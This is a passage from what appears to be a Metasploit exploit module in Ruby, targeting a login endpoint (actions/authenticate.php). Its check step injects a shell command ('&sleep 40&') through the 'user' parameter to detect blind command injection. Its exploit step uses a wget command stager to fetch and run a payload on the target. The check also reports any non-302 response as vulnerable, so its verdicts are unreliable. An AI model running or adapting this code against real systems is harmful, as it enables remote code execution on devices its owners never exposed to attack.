      'uri'           => normalize_uri(uri, 'actions', 'authenticate.php'),
      'encode_params' => false,
      'vars_post'     => {
        'user' => "unsafe+%22%26sleep+40%26%22", # checking blind command injection via sleep
        'pswd' => "inline"
      }
    })
    if res && res.code == 302
      return Exploit::CheckCode::Safe
    else
      return Exploit::CheckCode::Vulnerable
    end
  end

  def exploit
    print_status("Exploiting...")
    execute_cmdstager(flavor: :wget, delay: 10)
  end
end